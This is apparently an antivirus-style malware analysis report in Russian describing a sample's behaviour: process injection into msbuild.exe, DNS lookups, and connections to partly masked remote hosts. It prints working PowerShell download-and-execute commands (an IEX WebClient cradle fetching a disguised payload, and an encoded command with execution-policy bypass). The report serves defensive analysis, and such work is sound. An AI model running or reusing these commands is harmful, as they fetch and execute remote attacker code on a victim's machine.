Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://sp###mantra.biz/blyat.jpeg')
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
Сетевая активность
Подключается к
- 'su#####at.duckdns.org':3396
TCP
Запросы HTTP GET
- http://sp###mantra.biz/blyat.jpeg
- http://sp###mantra.biz/rnp.txt
- http://sp###mantra.biz/main.txt
UDP
- DNS ASK sp###mantra.biz
- DNS ASK su#####at.duckdns.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://sp###mantra.biz/blyat.jpeg')' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep Bypass -w 1 /e JABYAHcAIAA9ACAAJwBNAHUAZwBwAGoAcwBjAFcAQgAnADsACgAkAFAAcwBiAGIAWQBWAGwAYgBrACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'
